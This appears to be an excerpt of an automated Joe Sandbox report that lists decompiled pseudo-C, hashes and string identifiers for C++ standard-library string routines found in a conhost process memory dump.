                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: basic_string::_M_construct null not valid
                        • API String ID: 0-3522614731
                        • Opcode ID: 2d555e2d65516287e4ba4df9a30baac1f6735f76fb3a163cd8c5699a55140ec5
                        • Instruction ID: 9080fd1200ec80f54c0a025b621ded2df11fcf9d2706b9479ce32405664fd804
                        • Opcode Fuzzy Hash: 2d555e2d65516287e4ba4df9a30baac1f6735f76fb3a163cd8c5699a55140ec5
                        • Instruction Fuzzy Hash: 87511866A09B5191EB309F16E4021BDB7A9EB4DFD4F4841B1DE9CA7799CE3CD582C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E7CB0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E7CB0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x935e7ce2;
				r9d = 0;
				_t3 = E00007FF67FF6935E5F50(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}





                        0x7ff6935e7cb5
                        0x7ff6935e7cb8
                        0x7ff6935e7cc1
                        0x7ff6935e7ccc
                        0x7ff6935e7cd1
                        0x7ff6935e7cd4
                        0x7ff6935e7cd9
                        0x7ff6935e7ce1

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                        • API String ID: 0-1533248280
                        • Opcode ID: 7e988ea75a420e46f3efdbfbbdb68b2998f8cf7dbfdfae6fa6859e295e43672e
                        • Instruction ID: 642b6ea9dfab650ef6a62c401a9d8ac3b75110263dfb76ce216ed42e9679ee51
                        • Opcode Fuzzy Hash: 7e988ea75a420e46f3efdbfbbdb68b2998f8cf7dbfdfae6fa6859e295e43672e
                        • Instruction Fuzzy Hash: DB4127A2F0674591EF319B61E45A3BD6398EB6CBC8F444071DE0C6B3A5EE2CC595C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E82D0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E82D0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
				void* _t3;
				long long* _t7;

				_t7 = __rcx;
				_t9 =  *__rdx;
				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x935e8302;
				r9d = 0;
				_t3 = E00007FF67FF6935E5F50(__r8, _t9 + __r8, _t9 + _t16);
				 *_t7 = __r8;
				return _t3;
			}





                        0x7ff6935e82d5
                        0x7ff6935e82d8
                        0x7ff6935e82e1
                        0x7ff6935e82ec
                        0x7ff6935e82f1
                        0x7ff6935e82f4
                        0x7ff6935e82f9
                        0x7ff6935e8301

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                        • API String ID: 0-1533248280
                        • Opcode ID: 4f257e8eea9157a3d96d25ff752e029291c5207e82449faa54e08378e86be904
                        • Instruction ID: a5b2ee8911e7da0ac895e58eed6b8be65988fa6ce3835757e131a34b013c0c4f
                        • Opcode Fuzzy Hash: 4f257e8eea9157a3d96d25ff752e029291c5207e82449faa54e08378e86be904
                        • Instruction Fuzzy Hash: BB4112A2F0674591EE309B61E8563BD6398EB6CFC8F444071DE4C6B396EE2CD895C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EB4A0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00007FF67FF6935EB4A0(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x935eb4ca;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF6935EA150(_t5, _t6, __rcx, __rdx -  *__rcx,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}






                        0x7ff6935eb4b5
                        0x7ff6935eb4b7
                        0x7ff6935eb4bc
                        0x7ff6935eb4c9

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
                        • API String ID: 2619041689-3628603605
                        • Opcode ID: 8f309133e528bfb8a631c1d82b6f70a6350f78bbf3e98dc5030f9ab0ab73fada
                        • Instruction ID: 2641901604348d406744e3905796ade3cf65cc4deae59f85047794143c4730ef
                        • Opcode Fuzzy Hash: 8f309133e528bfb8a631c1d82b6f70a6350f78bbf3e98dc5030f9ab0ab73fada
                        • Instruction Fuzzy Hash: 03412762E0968691EA30EB65D8129BD33A8FB1DBC4F844076ED0CB3761EE6CD155D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EE670 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00007FF67FF6935EE670(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				long long _v24;
				void* _t5;
				void* _t6;

				if (__rdx -  *__rcx >> 1 -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x935ee69d;
				_v24 =  *((intOrPtr*)(__r8 + 8));
				r8d = 0;
				return E00007FF67FF6935ED220(_t5, _t6, __rcx, __rdx -  *__rcx >> 1,  *((intOrPtr*)(__r8 + 8)),  *__r8);
			}






                        0x7ff6935ee688
                        0x7ff6935ee68a
                        0x7ff6935ee68f
                        0x7ff6935ee69c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
                        • API String ID: 1844840824-3628603605
                        • Opcode ID: 6fe8f4218b3338248ec7482308bc08983a46f8b89ad32865e54b27b11b18f773
                        • Instruction ID: 3d83d9637475c169a9f1fcab677aacbba282c2c8e11cce2e99e6dff05195b142
                        • Opcode Fuzzy Hash: 6fe8f4218b3338248ec7482308bc08983a46f8b89ad32865e54b27b11b18f773
                        • Instruction Fuzzy Hash: 46414892E19A8291EA30DB26D8025BD2359FB5DBC4F849472EE0CA3751FE2CD255D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EE1D0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                        • API String ID: 3510742995-4063909124
                        • Opcode ID: f23f27cd75e7038fd93b8e4d6321b72cf5f1972dcdcf113a62a095ed471e35e9
                        • Instruction ID: 6a9fa769cad16f59ce306065c94c89312482de176c1508d3f6031740b9dc2510
                        • Opcode Fuzzy Hash: f23f27cd75e7038fd93b8e4d6321b72cf5f1972dcdcf113a62a095ed471e35e9
                        • Instruction Fuzzy Hash: 4441D3A2B28B96A0DA30DF59C4064BD2368FB4DBC0B858572DE5DA7391DF3CE545C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EB020 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                        • API String ID: 3510742995-4063909124
                        • Opcode ID: 71592ad96ff82efb201a7f99c5c042052940edf3ed562ae9d1175999a64afd26
                        • Instruction ID: 6d78de5692af92be6a7530dc956753bdef579cd31cdd24687114c424f4c5d344
                        • Opcode Fuzzy Hash: 71592ad96ff82efb201a7f99c5c042052940edf3ed562ae9d1175999a64afd26
                        • Instruction Fuzzy Hash: B54128A7B0D78A91DA30DB19D85A57D33A8FB5ABD5F8440B1DD5DA3391DE2CE141C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E7010 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E7010(intOrPtr* __r8, void* __r9, intOrPtr _a40) {
				void* _t8;
				void* _t22;
				intOrPtr* _t25;
				char* _t27;
				int _t28;
				int _t30;
				intOrPtr _t40;
				void* _t47;
				intOrPtr _t49;

				_t40 =  *((intOrPtr*)( *__r8 - 0x18));
				_t47 =  >  ? _a40 : _t40 - __r9;
				if (__r9 - _t40 > 0) goto 0x935e7042;
				goto 0x935e6e70;
				_t27 = "basic_string::insert";
				_t25 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
				E00007FF67FF6935F0580(_t8, __r9 - _t40, __r9, _t25, _t27, __r9,  *__r8 + __r9);
				_t49 =  *((intOrPtr*)( *_t25 - 0x18));
				if (_t27 - _t49 > 0) goto 0x935e70e0;
				if (__r9 - 0xfffffff9 - _t49 > 0) goto 0x935e70f6;
				r8d = 0;
				E00007FF67FF6935E78B0(_t25, _t27, __r9, __r9);
				if (__r9 == 0) goto 0x935e70bc;
				if (__r9 == 1) goto 0x935e70d0;
				return memset(_t22, _t30, _t28);
			}












                        0x7ff6935e701c
                        0x7ff6935e702c
                        0x7ff6935e7033
                        0x7ff6935e703d
                        0x7ff6935e7045
                        0x7ff6935e704f
                        0x7ff6935e7056
                        0x7ff6935e706f
                        0x7ff6935e707f
                        0x7ff6935e7091
                        0x7ff6935e7096
                        0x7ff6935e7099
                        0x7ff6935e70a1
                        0x7ff6935e70ae
                        0x7ff6935e70c8

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                        • API String ID: 2221118986-1339558951
                        • Opcode ID: 3680cf383b4ab3b4de776d973a36cc2fd91093533bbd7946157c72e6f439be4e
                        • Instruction ID: 798d38a065744161b958cde5659b2e9e277720b0315a754019b11c05357d7aa8
                        • Opcode Fuzzy Hash: 3680cf383b4ab3b4de776d973a36cc2fd91093533bbd7946157c72e6f439be4e
                        • Instruction Fuzzy Hash: A231346AF0978651EA309B1AE8069B92358EB4DBE0F884571DF1CA33A1ED3CE581C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EFFB0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: basic_string::append
                        • API String ID: 1844840824-3811946249
                        • Opcode ID: 6d1423d8eca0eb64354be2ec5ad14ebe267e54a2fe555800d2c3f9ce1365c203
                        • Instruction ID: e32338bfd297c6a91368c499a97016c7cb89643b5e27de57d2c36c9cd4a43f0d
                        • Opcode Fuzzy Hash: 6d1423d8eca0eb64354be2ec5ad14ebe267e54a2fe555800d2c3f9ce1365c203
                        • Instruction Fuzzy Hash: 99319DA6B09A4592EA30DB16C40A6BE2369FB49BC4FC98572DE5DA73D0EF3CD445D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935F0BF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • malloc.MSVCRT(?,?,FFFFFFFF,00007FF6935E6469,?,?,FFFFFFFF,00007FF6935E5EE5,?,00000000,basic_string::_M_create,00007FF6935E9481), ref: 00007FF6935F0C04
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                        • malloc.MSVCRT(?,?,?,?,?,?,?,00007FF6935E6469,?,?,FFFFFFFF,00007FF6935E5EE5,?,00000000,basic_string::_M_create,00007FF6935E9481), ref: 00007FF6935F0C6A
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID: basic_string::_M_create
                        • API String ID: 2803490479-3122258987
                        • Opcode ID: 3781ff1c97cdea221bf88c1965b9fab03deedbe7c33339f6a5c98b6c029bf31f
                        • Instruction ID: 2554e898740bfaf534456890d5f9255469b61db25ba3cdef65e5d1043dcd977d
                        • Opcode Fuzzy Hash: 3781ff1c97cdea221bf88c1965b9fab03deedbe7c33339f6a5c98b6c029bf31f
                        • Instruction Fuzzy Hash: 0B21F421B0670696FE78A765A9133B82294EF4C7A0F980AB4CE7D933C2DE3C6185D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935ECF40 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: basic_string::append
                        • API String ID: 2619041689-3811946249
                        • Opcode ID: b3c9f95d69199fe4f6e135795168b1bf7e0d36b165392470edb0defbc408885f
                        • Instruction ID: d620952cf94c3cd25c319ae83868c7043e96e88b9a24137a13e065c9e2b5033c
                        • Opcode Fuzzy Hash: b3c9f95d69199fe4f6e135795168b1bf7e0d36b165392470edb0defbc408885f
                        • Instruction Fuzzy Hash: 3831C3A7A0978595DA30DA19D45A67D23A8EB4ABD4F8841B2ED6DA7381EE3CD141C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E78B0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                        Download Yara Rule
                        C-Code - Quality: 31%
                        			E00007FF67FF6935E78B0(long long* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* _v73;
				void* _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				long long* _t25;
				long long _t37;
				intOrPtr _t38;
				long long _t45;

				_t23 =  *((intOrPtr*)(__rcx));
				_t38 =  *((intOrPtr*)(_t23 - 0x18));
				_t25 = __rcx;
				_t37 = __r9 - __r8 + _t38;
				if (_t37 -  *((intOrPtr*)(_t23 - 0x10)) > 0) goto 0x935e78fb;
				if ( *((intOrPtr*)(_t23 - 8)) <= 0) goto 0x935e7990;
				_t24 =  *((intOrPtr*)(__rcx));
				E00007FF67FF6935E6400(_t16, _t37,  *((intOrPtr*)(_t24 - 0x10)));
				if (__rdx == 0) goto 0x935e7930;
				_t8 = _t24 + 0x18; // 0x18
				_t45 = _t8;
				if (__rdx == 1) goto 0x935e79d0;
				memcpy(??, ??, ??);
				if (_t38 - __r8 + __rdx != 0) goto 0x935e7970;
				asm("lock xadd [ecx-0x8], eax");
				if (0xffffffff <= 0) goto 0x935e79c0;
				 *_t25 = _t45;
				 *((intOrPtr*)(_t45 - 8)) = 0;
				 *((long long*)(_t45 - 0x18)) = _t37;
				 *((char*)(_t45 + _t37)) = 0;
				return 0xffffffff;
			}











                        0x7ff6935e78c0
                        0x7ff6935e78c3
                        0x7ff6935e78d8
                        0x7ff6935e78de
                        0x7ff6935e78e7
                        0x7ff6935e78ee
                        0x7ff6935e78f4
                        0x7ff6935e7903
                        0x7ff6935e7912
                        0x7ff6935e7917
                        0x7ff6935e7917
                        0x7ff6935e791f
                        0x7ff6935e792b
                        0x7ff6935e7933
                        0x7ff6935e793d
                        0x7ff6935e7944
                        0x7ff6935e7946
                        0x7ff6935e7949
                        0x7ff6935e7952
                        0x7ff6935e7957
                        0x7ff6935e796c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_create
                        • API String ID: 3510742995-3122258987
                        • Opcode ID: 0b1a823ea0bf0b89393b105191e95c34773964d8759d6ceaef8484d3d0857b70
                        • Instruction ID: 4207af0b88f2a8e998d70fb4b5bdbd27e452d4ebdc35ca77f70808c328e1dc3d
                        • Opcode Fuzzy Hash: 0b1a823ea0bf0b89393b105191e95c34773964d8759d6ceaef8484d3d0857b70
                        • Instruction Fuzzy Hash: 47310773B09B86A4E6319E2A944957D2778EF19FD4F5840B2DE5CD73A1DE2CD441C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E6AA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E00007FF67FF6935E6AA0(intOrPtr* __rcx, void* __rdx, void* __r8) {
				intOrPtr _t15;
				void* _t18;

				_t15 =  *__rcx;
				_t18 = __r8;
				if (__r8 - 0xfffffff9 > 0) goto 0x935e6bb5;
				if (_t15 - __rdx > 0) goto 0x935e6af0;
				if (_t15 +  *((intOrPtr*)(_t15 - 0x18)) - __rdx < 0) goto 0x935e6af0;
				if ( *((intOrPtr*)(_t15 - 8)) <= 0) goto 0x935e6b28;
				E00007FF67FF6935E78B0(__rcx, _t15 +  *((intOrPtr*)(_t15 - 0x18)),  *((intOrPtr*)( *__rcx - 0x18)), __r8);
				if (_t18 == 0) goto 0x935e6b17;
				if (_t18 == 1) goto 0x935e6b70;
				return memcpy(??, ??, ??);
			}





                        0x7ff6935e6aa9
                        0x7ff6935e6aaf
                        0x7ff6935e6ac6
